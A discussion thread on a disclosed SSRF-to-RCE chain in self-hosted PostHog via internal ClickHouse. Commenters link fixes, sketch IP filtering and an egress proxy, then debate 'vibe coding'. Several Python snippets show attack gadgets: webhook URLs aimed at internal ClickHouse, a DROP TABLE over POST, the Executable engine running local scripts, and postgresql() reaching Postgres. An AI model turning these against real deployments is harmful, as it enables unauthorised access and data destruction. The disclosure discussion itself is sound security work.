I work on security at PostHog. We resolved these SSRF findings back in October 2024 when this report was responsibly disclosed to us. I'm currently gathering the relevant PRs so that we can share them here. We're also working on some architectural improvements around egress, namely using smokescreen, to better protect against this class of issue.
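For those unfamiliar, the egress-proxy idea is that services never fetch user-supplied URLs directly; all outbound HTTP goes through a proxy that enforces allow/deny rules in one place. A minimal sketch of what that looks like from the application side (the proxy address is an assumption based on smokescreen's default port, not our actual config):

    # Sketch: route webhook delivery through an egress proxy such as
    # smokescreen, so SSRF policy lives in one place instead of in every
    # service. The proxy address is an assumption, not a deployment detail.
    import requests

    SMOKESCREEN = "http://smokescreen:4750"  # 4750 is smokescreen's default port

    def deliver_webhook(url: str, payload: dict) -> None:
        # The proxy, not this service, decides whether the destination
        # resolves to an internal address, and rejects the request if so.
        requests.post(url, json=payload, timeout=5,
                      proxies={"http": SMOKESCREEN, "https": SMOKESCREEN})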
piccirello 10 hours ago [-]
Here's the PR[0] that resolved the SSRF issue. This fix was shipped within 24 hours of receiving the initial report.
It's worth noting that at the time of this report, this only affected PostHog's single tenant hobby deployment (i.e. our self hosted version). Our Cloud deployment used our Rust service for sending webhooks, which has had SSRF protection since May 2024[1].
Since this report we've evolved our Cloud architecture significantly, and we have similar IP-based filtering throughout our backend services.
[0] https://github.com/PostHog/posthog/pull/25398
[1] https://github.com/PostHog/posthog/commit/281af615b4874da1b8...
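For anyone curious what "IP-based filtering" means concretely, the shape of it is roughly this (a sketch, not our actual implementation; the function name is illustrative):

    # Sketch of IP-based SSRF filtering for webhook URLs; illustrative,
    # not PostHog's actual code.
    import ipaddress
    import socket
    from urllib.parse import urlparse

    def assert_safe_webhook_url(url: str) -> None:
        host = urlparse(url).hostname
        if host is None:
            raise ValueError("webhook URL has no host")
        # Check every address the name resolves to, so a DNS name can't
        # be used to smuggle in an internal IP.
        for info in socket.getaddrinfo(host, None):
            ip = ipaddress.ip_address(info[4][0])
            if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
                raise ValueError(f"webhook URL resolves to blocked address {ip}")

Note that resolve-then-fetch checks like this are still racy against DNS rebinding, which is part of why we're also moving toward an egress proxy as mentioned above.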
> As it described on Clickhouse documentation, their API is designed to be READ ONLY on any operation for HTTP GET
As described in the ClickHouse documentation, their API is designed to be READ ONLY for any operation over HTTP GET requests.
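Concretely, that behavior looks like this (a sketch against a stock local ClickHouse; localhost:8123 is just the default HTTP port, and none of this is taken from the write-up):

    # ClickHouse's HTTP interface runs GET queries in readonly mode:
    # SELECTs work, writes are rejected. POST has no such restriction.
    import requests

    base = "http://localhost:8123/"

    # Read over GET: allowed.
    print(requests.get(base, params={"query": "SELECT version()"}).text)

    # Write over GET: rejected with a readonly-mode error.
    r = requests.get(base, params={"query": "DROP TABLE IF EXISTS t"})
    print(r.status_code, r.text)

    # The same statement over POST is accepted.
    requests.post(base, data="DROP TABLE IF EXISTS t")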
lkt 12 hours ago [-]
Out of interest, how much does ZDI pay for a bug like this?
rs_rs_rs_rs_rs 4 hours ago [-]
They probably don't accept something like this. Not that many Posthog self-hosted instances out there...
lkt 4 hours ago [-]
That's what I thought too, but the article says it was submitted to ZDI and they handled the communication with Posthog
danr4 2 hours ago [-]
Very nice write up!
anothercat 12 hours ago [-]
Does this require authenticated access to the posthog api to kick off? In that case I feel clickhouse and posthog both have their share of the blame here.
nightpool 12 hours ago [-]
It looks like the entire class of bugs here is "if you have access to PostHog's admin dashboard, you can configure webhook URLs that hit PostHog's internal services". That's not particularly surprising for a self-hosted system like the author's, but I expect it would be pretty bad if you were using their cloud-hosted product.
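In other words, the attack shape is "make the product's own backend issue the request for you". Roughly (the hostname is an assumption, and 8123 is just ClickHouse's default HTTP port, not necessarily PostHog's exact topology):

    # What an unvalidated webhook sender effectively does with an
    # attacker-chosen URL. "clickhouse:8123" is an assumed internal
    # hostname, not a confirmed deployment detail.
    import requests

    webhook_url = "http://clickhouse:8123/?query=SELECT+1"  # attacker-controlled
    requests.post(webhook_url, json={"event": "user signed up"})
    # Even an error response proves the internal service is reachable
    # from the backend, which is the foothold the SSRF provides.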
anothercat 3 hours ago [-]
Ah of course! I forgot about the cloud hosted option.
thenaturalist 13 hours ago [-]
Wow, chapeau to the author.
What an elegant, interesting read.
What I don't quite understand: Why is the Clickhouse bug not given more scrutiny?
That escape bug is what made the RCE possible, and surely a core DB company like ClickHouse should be held accountable for such an oversight?
matmuls 13 hours ago [-]
SSRF was the entry point, and ClickHouse is supposed to be an internal-only service that could only be reached via that SSRF, hence the lesser scrutiny. The 0day by itself wouldn't be useful unless an attacker can reach ClickHouse, which they usually can't.
thenaturalist 12 hours ago [-]
But if they do, preventing SQL injection, a critical last-mile vulnerability, seems trivial?
ch2026 11 hours ago [-]
Sure, it’s a bug they can fix. But it’s more the setup itself that’s the issue. For example, ClickHouse’s HTTP interface would normally require user/pass auth and not have access to all privileges. ClickHouse also has a table engine that maps to local processes (e.g. SELECT from a Python process you pipe stdin into), as sketched below.
No need for postgres if you have a fully authenticated user.
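(That's the Executable table engine. Very roughly, and hedged because the script name here is made up and, by default, scripts have to live in ClickHouse's user_scripts directory:)

    # Sketch: ClickHouse's Executable table engine reads rows from the
    # stdout of a local process. 'gen.py' is illustrative and must live
    # in the server's user_scripts directory for this to work.
    import requests

    ddl = "CREATE TABLE gen (x UInt64) ENGINE = Executable('gen.py', TabSeparated)"
    requests.post("http://localhost:8123/", data=ddl)
    print(requests.post("http://localhost:8123/", data="SELECT * FROM gen").text)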
nightpool 11 hours ago [-]
The author already had basically full ClickHouse querying abilities, and ClickHouse lets you run arbitrary SQL on Postgres. The fact that the author used a read-only command to do it wasn't bypassing a security boundary (anyone with access to the ClickHouse DB also had access to the Postgres DB); it was just a gadget that made the SSRF more convenient. They could have escalated into a different internal HTTP API instead.
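(For reference, the gadget in question is ClickHouse's postgresql() table function, which lets a plain SELECT proxy through to Postgres. A sketch; every connection detail below is a placeholder:)

    # Sketch: a "read-only" ClickHouse query that reaches into Postgres.
    # Arguments to postgresql() are host:port, database, table, user,
    # password; all values here are placeholders.
    import requests

    q = ("SELECT * FROM postgresql('postgres:5432', 'posthog', "
         "'posthog_user', 'postgres', 'password')")
    requests.get("http://clickhouse:8123/", params={"query": q})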
PostHog does a lot of vibe coding; I wonder how many other issues they have.
Nextgrid 13 hours ago [-]
Not that I’m disputing it, but do you have a source? Companies say all kinds of things for hype and to attract investors, but it doesn’t necessarily make it true.
matmuls 12 hours ago [-]
Looking at their commits, there are 300+ tagged with a "Generated with https://claude.com/claude-code" attribution.
dewey 12 hours ago [-]
Just because AI tools are involved doesn't mean it's "Vibe coding".
somat 7 hours ago [-]
If you leave "Generated with claude-code" in the commit message, it was vibe coded.
Unfortunately a lot of people think it means any time an LLM helps write code, but I think we're winning that semantic battle - I'm seeing more examples of it used correctly than incorrectly these days.
It's likely that the majority of code will be AI assisted in some way in the future, at which point calling all of it "vibe coding" will lose any value at all. That's why I prefer the definition that specifies unreviewed.
chrisweekly 8 hours ago [-]
I share your preference. (I also mourn the loss of the word "vibe" for other contexts.) In this case there were apparently hundreds of commit messages stating "generated by Claude Code". I feel like there's a missing set of descriptors -- something similar to Creative Commons with its now-familiar labels like "CC-BY-SA" -- that could be used to indicate the relative degree of human involvement. Full-on "AI-YOLO-Paperclips" at one extreme could be distinguished from "AI-IDE-TA" for typeahead / fancy autocomplete at the other. Simon, you're in a fantastic position to champion some kind of basic system like this. If you run w/ this idea, please give me a shout-out. :)
bopbopbop7 9 hours ago [-]
I also hope that the majority of code in the future is AI-assisted like it is at PostHog, because my cybersecurity firm is going to make so much money.
hsbauauvhabzb 11 hours ago [-]
It sure is a pretty good indicator, and if you underestimate human laziness you’re gonna have a bad time regardless.
jwpapi 11 hours ago [-]
Also, look at how much they’ve released and how fast, and how they blog like they own the world (or design the website).
I used to look up to Posthog as I thought, wow this is a really good startup. They’re achieving a lot fast actually.
But it turns out a lot was sloppy. I don’t trust them anymore and would opt for another platform now.